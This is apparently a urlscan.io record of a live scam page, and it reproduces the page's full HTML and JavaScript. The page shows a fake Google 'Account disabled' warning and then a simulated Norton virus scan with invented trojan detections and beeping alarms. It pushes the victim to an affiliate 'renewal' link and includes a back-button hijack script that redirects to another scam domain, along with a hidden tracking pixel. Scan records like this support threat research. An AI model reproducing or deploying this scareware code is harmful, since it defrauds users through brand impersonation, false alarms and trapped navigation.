malware-stop.com
Open in
urlscan Pro
2606:4700:3036::ac43:d9b9
Public Scan
Submitted URL: http://koi-tika.jj7f.in/ga/click/2-235131196-20401-30245-59159-35934-a854d3267d-c946499aa4
Effective URL: https://malware-stop.com/UK-N-ANT-380-16112023/?u=14C380
Submission: On February 05 via api from US — Scanned from US
Effective URL: https://malware-stop.com/UK-N-ANT-380-16112023/?u=14C380
Submission: On February 05 via api from US — Scanned from US
Form analysis
1 forms found in the DOMName: registerForm — POST
<form rel="noreferrer" action="" method="post" name="registerForm">
<img src="http://natureviewer.in/clicks?p=380P14C380&e=&s3=&s4=" class="hidden clickall" style="display: none;">
<div class="header">
<div class="container">
<div class="row">
<div class="col-sm-6 col-xs-6">
<img src="img/logo.png" class="logoto">
</div>
<div class="col-sm-6 col-xs-6">
<img src="img/tp.png" class="bggh">
</div>
</div>
</div>
</div>
<div class="middle-box" id="middle-box" style="display:none;">
<div class="container">
<div class="header-two">
<div class="row">
<div class="col-sm-6 col-xs-6">
<img src="img/logo.png" class="logo">
</div>
<div class="col-sm-6 col-xs-6">
<div class="smlicon">
<img src="img/icon1.png" class="newicon">
<img src="img/cross.png" class="crossicon">
</div>
</div>
</div>
<div class="seting">
<p><img src="img/setting.png" class="imgset"> Settings <span><img src="img/qs.png" class="imgset"> Help</span></p>
</div>
<div class="prt clearfix">
<div class="atrisk clearfix">
<div class="col-md-3 col-xs-3">
<img src="img/img2.png" class="fgtr">
</div>
<div class="col-sm-9 col-xs-9">
<div class="text-one">
<h4>You Are Protected</h4>
<ul>
<li>Protection Updates: <span class="tx-o">Current </span> </li>
<li>Last Scan: <span class="tx-tw">Not available | Quick Scan </span> </li>
<li>Licenses Used: <span class="tx-th">1 of 5 | | Install on Another Device </span> </li>
</ul>
</div>
</div>
</div>
</div>
<div class="descri clearfix">
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>Security</h4>
<img src="img/img3.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>Identity</h4>
<img src="img/img4.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>Performance</h4>
<img src="img/img5.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
<div class="col-sm-3 col-sm-6 col-xs-6">
<div class="control">
<h4>More Norton </h4>
<img src="img/img6.png" class="center-block imgds">
<p>Protected</p>
</div>
</div>
</div>
<div class="gray_line2">
<div class="ftr"><span> SUBSCRIPTION STATUS: </span><span class="bhfdf"> 30 days left </span></div>
</div>
</div>
<div class="header-three" id="header-three" style="display:none;">
<div class="haderindder">
<div class="row">
<div class="col-sm-6 col-xs-6">
<h4>Quick Scan</h4>
</div>
<div class="col-sm-6 col-xs-6">
<div class="smlicon">
<img src="img/icon1.png" class="newicon">
<img src="img/cross.png" class="crossicon">
</div>
</div>
</div>
</div>
<div class="red-scanning clearfix">
<div class="col-sm-3 col-xs-4">
<div class="wrking">
<p><img src="img/ring.png" class="nhvf"> Working</p>
</div>
</div>
<div class="col-sm-9 col-xs-8">
<div class="scn-cont">
<ul class="local-scan">
<h4>Results Summary</h4>
<li id="li-one">C:\Windows\System32\csrss.exe</li>
<li id="li-two" style="display: none;">C:\Windows\System32\sihost.exe</li>
<li id="li-three" style="display: none;">C:\Program Files\Windows Defender\MSASCuiL.exe</li>
<li id="li-four" style="display: none;">C:\Windows\System32\SgrmBroker.exe</li>
<li id="li-five" style="display: none;">C:\Windows\System32\DDFs</li>
<li id="li-six" style="display: none;">C:\Windows\System32\Recovery</li>
<li id="li-seven" style="display: none;">C:\Windows\System32\DriverState</li>
<li id="li-eight" style="display: none;">tempRoot\system32\DRIVERS\bowser.sys</li>
<li id="li-nine" style="display: none;">C:\Windows\System32\DDFs</li>
<li id="li-ten" style="display: none;">C:\Windows\System32\Recovery</li>
</ul>
</div>
</div>
</div>
<div class="scanning-number">
<div class="line-one">Results Summary</div>
<div class="line-one">[+] Total number of documents scanned: <span class="chng-num"><span class="total"></span></span></div>
<div class="line-one">[+] Total number of of images scanned: <span class="chng-num-img pachis">825</span></div>
<div class="line-one">[+] Total risk found: <span class="chng-num-risk five-num">5</span></div>
<div class="line-one">Total security risk which requires action: <span class="chng-num-risk five-num">5</span></div>
<div class="blankdiv"></div>
</div>
<div class="stop-pause-btn-box">
<img src="img/logo.png" class="mkbnjhg">
<button type="button" class="bnts-stop gray-color">Pause</button>
<button type="button" class="bnts-stop red-color">Stop</button>
</div>
</div>
<div class="last-header clearfix" id="last-header" style="display:none;">
<div class="haderilndder">
<div class="row">
<div class="col-sm-6 col-xs-6">
<img src="img/logo.png" class="lstlogo">
</div>
<div class="col-sm-6 col-xs-6">
<div class="smlicon">
<img src="img/icon1.png" class="newicon">
<img src="img/cross.png" class="crossicon">
</div>
</div>
</div>
</div>
<div class="total-virs">
<h4>Your system is infected with 5 viruses!</h4>
</div>
<div class="subbox">
<p>ACTION REQUIRED!</p>
<p>Your Norton AntiVirus Subscription Has Expired!</p>
<p>Renew now to keep your system protected.</p>
<p>If your system is unprotected, it is at risk for viruses and other malware.</p>
<div class="lastbtn">
<a href="https://www.swagtrk.com/B3M427L/6QQP66JK/?sub3=380P14C380" rel="noreferrer" class="hsjs"> Continue...
</a>
</div>
</div>
</div>
</div>
<div class="right-side-small-box">
<div class="div-one" id="one-sm-div" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Win32/Hoax.Renos.HX
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-two" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Trojan IRC/Backdor.Sd.FRV
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-three" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Adware.Win32.Look2me.ab
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-four" style="display: none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Trojan.Qoologic - Key Logger
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
<div class="div-one" id="one-sm-five" style="display:none;">
<div class="line_red">
<p><b> Threat detected!</b></p> Trojan.Fakealert.356
</div>
<div class="updates">
<p> <img src="img/ico7.gif" class="icon-seven"> High risk</p>
<p><img src="img/home.gif" class="home"> <span class="org"><b> Origin </b></span><br>
<span class="hnhh"> Not available</span>
</p>
<p><img src="img/flag.gif" class="flag">
<span><b> Activity </b><br>
<span class="hnhh"> Threat actions performed: 1 </span>
</span>
</p>
</div>
</div>
</div>
</div>
<div class="newmacfee-add">
<div class="hgdeer">
<div class="logopat">
<img src="img/logo.png">
</div>
</div>
<div class="newmacfee-add fb-look">
<div class="blu-bar"></div>
<div id="message-page">
<div class="modal-content text-center" id="modal-content">
<div id="origahog" style="line-height: 1.6;">
<img class="ques-i" src="img/drive-i.png">
<span class="message">
<h2 style="font-size: 36px; font-weight:normal; margin: 10px 10px 20px 10px;">Account disabled</h2>
<p class="bhvgh">
<img class="user-i" src="img/acnt.png" alt=""><!-- aks@blueberrywebs.com -->
</p>
<p class="gap-all">
<span class="subhead" id="redtext"> Google accounts are usually disabled because <br> Google detects a policy violation. </span>
</p>
<!--<h4 style="font-size: 23px;margin: 0;color:#d300ff;"><span id="theTime">4 minutes and 44 seconds</span></h4>-->
<button type="button" class="att">RECOVER ACCOUNT NOW</button>
</span>
</div>
<!--<div class="prog-info">
<h3>98.7 GB of 100 GB used <img class="pull-right" style="height: 22px;" src="img/info-i.png"></h3>
<br />
<div class="progress" style="max-width: 100%">
<div class="progress-bar"
style="width: 18%; background:#3865c7;">18%
</div>
<div class="progress-bar" style="width: 15%; background:#c02816;">15%
</div>
<div class="progress-bar bg-danger progress-bar-stripped" style="width: 62%; background:#e1a724;">
65.7%
</div>
<div class="progress-bar progress-bar-stripped" style="width: 5%; background-color:#d4d4d4;">
1.3%
</div>
</div>
</div>-->
<!--<div class="mod-info">
<p><div class="bullet"></div> <span>Google Drive </span> <strong>18GB</strong></p>
<p><div class="bullet red"></div> <span>Gmail </span><strong>15GB</strong> </p>
<p><div class="bullet ylw"></div> <span>Google Photos </span><strong>65.7GB</strong></p>
</div>
</div>
</div>-->
<!-- <section class="text-center">
<h5> Are you <span></span>? </h5>
</section> -->
<!--<section>
<div class="wht-sec-foot">
<div class="row">
<div class="col">
<strong>English (US)</strong>
<br>
Français (France)
<br>
Português (Brasil)
<br>
Italiano
</div>
<div class="col">
Español
<br>
中文(简体)
<br>
Deutsch
<br>
+
</div>
</div>
</div>
</section> -->
</div>
<div style="width: 100%;height: 30px;"></div>
</div>
<script>
$(document).ready(function() {
$("button.att").click(function() {
$(".newmacfee-add").hide();
$(".middle-box").show();
});
});
</script>
<script>
$(document).ready(function() {
$("button.att").click(function() {
setTimeout(function() {
document.getElementById("middle-box").style.display = "block";
}, 2000);
setTimeout(function() {
document.getElementById("header-three").style.display = "block";
}, 2000);
setTimeout(function() {
document.getElementById("last-header").style.display = "block";
}, 13000);
/* Right side small box code stert*/
setTimeout(function() {
$('#one-sm-div').addClass('highlight');
}, 3000);
setTimeout(function() {
$('#one-sm-div').removeClass('highlight');
}, 4000);
setTimeout(function() {
$('#one-sm-two').addClass('highlight');
}, 4000);
setTimeout(function() {
$('#one-sm-two').removeClass('highlight');
}, 6000);
setTimeout(function() {
$('#one-sm-three').addClass('highlight');
}, 6000);
setTimeout(function() {
$('#one-sm-three').removeClass('highlight');
}, 8000);
setTimeout(function() {
$('#one-sm-four').addClass('highlight');
}, 8000);
setTimeout(function() {
$('#one-sm-four').removeClass('highlight');
}, 10000);
setTimeout(function() {
$('#one-sm-five').addClass('highlight');
}, 10000);
setTimeout(function() {
$('#one-sm-five').removeClass('highlight');
}, 12000);
/* Right side small box code end*/
/* cdrive code working stert*/
setTimeout(function() {
document.getElementById("li-one").style.display = "block";
}, 2000);
setTimeout(function() {
document.getElementById("li-one").style.display = "none";
}, 3000);
setTimeout(function() {
document.getElementById("li-two").style.display = "block";
}, 3000);
setTimeout(function() {
document.getElementById("li-two").style.display = "none";
}, 4000);
setTimeout(function() {
document.getElementById("li-three").style.display = "block";
}, 4000);
setTimeout(function() {
document.getElementById("li-three").style.display = "none";
}, 5000);
setTimeout(function() {
document.getElementById("li-four").style.display = "block";
}, 5000);
setTimeout(function() {
document.getElementById("li-four").style.display = "none";
}, 6000);
setTimeout(function() {
document.getElementById("li-five").style.display = "block";
}, 6000);
setTimeout(function() {
document.getElementById("li-five").style.display = "none";
}, 7000);
setTimeout(function() {
document.getElementById("li-six").style.display = "block";
}, 7000);
setTimeout(function() {
document.getElementById("li-six").style.display = "none";
}, 8000);
setTimeout(function() {
document.getElementById("li-seven").style.display = "block";
}, 8000);
setTimeout(function() {
document.getElementById("li-seven").style.display = "none";
}, 9000);
setTimeout(function() {
document.getElementById("li-eight").style.display = "block";
}, 9000);
setTimeout(function() {
document.getElementById("li-eight").style.display = "none";
}, 10000);
setTimeout(function() {
document.getElementById("li-nine").style.display = "block";
}, 10000);
setTimeout(function() {
document.getElementById("li-eight").style.display = "none";
}, 11000);
setTimeout(function() {
document.getElementById("li-ten").style.display = "block";
}, 11000);
setTimeout(function() {
document.getElementById("li-ten").style.display = "none";
}, 11000);
/* cdrive code working end*/
/*Number code stert*/
$({
counter: 0
}).animate({
counter: 2022
}, {
duration: 10000,
easing: 'linear',
step: function() {
$('.total').text(Math.ceil(this.counter))
},
complete: function() {}
});
$({
counter: 0
}).animate({
counter: 825
}, {
duration: 10000,
easing: 'linear',
step: function() {
$('.pachis').text(Math.ceil(this.counter))
},
complete: function() {}
});
$({
counter: 0
}).animate({
counter: 5
}, {
duration: 10000,
easing: 'linear',
step: function() {
$('.five-num').text(Math.ceil(this.counter))
},
complete: function() {}
});
/*Number code End*/
/*BeeP Code start*/
audioCtx = new(window.AudioContext || window.webkitAudioContext)();
function beep() {
volume = 0.7;
duration = 500;
type = "square"; // "sine", "sawtooth", "triangle"
frequency = 900;
var oscillator = audioCtx.createOscillator();
var gainNode = audioCtx.createGain();
oscillator.connect(gainNode);
gainNode.connect(audioCtx.destination);
gainNode.gain.value = volume;
oscillator.frequency.value = frequency;
oscillator.type = type;
oscillator.start();
setTimeout(function() {
oscillator.stop();
}, duration);
};
var i = 1;
x = setInterval(function() {
beep();
i++;
if (i > 5) clearInterval(x);
}, 2000);
/*BeeP Code end*/
});
});
</script>
<script>
(function(window, location) {
var redirect = "https://royal.lo7y.in/WW-gHlL0x011/";
var currentUrl = location.origin + location.pathname + location.search;
if (location.hash !== "#!/hst") {
history.replaceState(null, document.title, currentUrl + "#!/hst");
history.pushState(null, document.title, currentUrl);
}
window.addEventListener("popstate", function() {
if (location.hash === "#!/hst") {
setTimeout(function() {
window.location.replace(redirect);
}, 0);
}
}, false);
}
(window, location));
</script>
</div>
</div>
</form>
Text Content
Settings Help YOU ARE PROTECTED * Protection Updates: Current * Last Scan: Not available | Quick Scan * Licenses Used: 1 of 5 | | Install on Another Device SECURITY Protected IDENTITY Protected PERFORMANCE Protected MORE NORTON Protected SUBSCRIPTION STATUS: 30 days left QUICK SCAN Working RESULTS SUMMARY * C:\Windows\System32\csrss.exe * C:\Windows\System32\sihost.exe * C:\Program Files\Windows Defender\MSASCuiL.exe * C:\Windows\System32\SgrmBroker.exe * C:\Windows\System32\DDFs * C:\Windows\System32\Recovery * C:\Windows\System32\DriverState * tempRoot\system32\DRIVERS\bowser.sys * C:\Windows\System32\DDFs * C:\Windows\System32\Recovery Results Summary [+] Total number of documents scanned: [+] Total number of of images scanned: 825 [+] Total risk found: 5 Total security risk which requires action: 5 Pause Stop YOUR SYSTEM IS INFECTED WITH 5 VIRUSES! ACTION REQUIRED! Your Norton AntiVirus Subscription Has Expired! Renew now to keep your system protected. If your system is unprotected, it is at risk for viruses and other malware. Continue... Threat detected! Win32/Hoax.Renos.HX High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Trojan IRC/Backdor.Sd.FRV High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Adware.Win32.Look2me.ab High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Trojan.Qoologic - Key Logger High risk Origin Not available Activity Threat actions performed: 1 Threat detected! Trojan.Fakealert.356 High risk Origin Not available Activity Threat actions performed: 1 ACCOUNT DISABLED Google accounts are usually disabled because Google detects a policy violation. RECOVER ACCOUNT NOW